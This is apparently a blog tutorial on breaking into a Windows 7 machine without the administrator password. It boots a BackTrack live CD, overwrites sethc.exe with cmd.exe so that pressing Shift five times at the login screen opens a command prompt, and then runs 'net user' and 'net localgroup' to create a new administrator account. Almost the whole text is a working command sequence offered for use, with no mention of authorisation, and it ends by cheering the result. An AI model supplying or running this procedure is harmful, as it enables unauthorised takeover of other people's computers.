hacking windows 7 username and password using backtrack
Windows Hacking
Here we’ll learn how to break an
Administrators password or to create an account without knowing the
Administrator password.
We
need a backtrack CD What we’ll do here is, we will change
the sticky key file “sethc.exe” file name to “cmd.exe” file so that if we will
press the shift button 5 times on the login screen the command prompt will come
up. Once the command prompt displayed we can make a user through command and
can give the Administrators rights to him.
Steps
:
1.
Insert the CD in CD-ROM Live boot the system through the backtrack O/S, Select the boot priority by pressing F12 CD/DVD
After the machine will boot if it will ask
you for the login, then the
Username
= Root
Password
= toor
Type
“startx” to change CLI to GUI
Once
you come to the GUI
2. Open a Terminal
Type:
#fdisk
–l
(To check the free disk)
3. #mkdir /mnt/cdrive
(To make a directory to mount the cdrive, you
can use any name here it is just a folder name)
4. #mount –t ntfs /dev/sda2
/mnt/cdrive
(Mount the C drive i.e. /dev/sda2 in cdrive folder)
5. #cd /mnt/cdrive
(To
change the directory/ to open the directory)
6. #cd /Windows/Sytem32
(To
see the System 32 folder)
7. #ls –l
(To
get the list of the files in System 32 folder)
8. #cp sethc.exe sethcbk.up
(To take the Backup of the sethc.exe file)
9. #cp cmd.exe sethc.exe
(To rename the file name)
10. Now restart the system
#init 6 /
reboot
You
can eject the CD now
Now
you’ve the windows login screen in front of you.
11. Press “shift key” 5 times
It
will show you the command prompt now, make the user.
12. #net user username password /add
e.g >net user abc 12345678 /add
Now
you’ve the user, you need to give Administrators right.
13: #net localgroup Administrators /add
username
e.g >net localgroup Administrators /add abc
Restart
the system now and Login with the new user!!
You
will notice that you have the administrative rights now. AWESOME !!!
Comments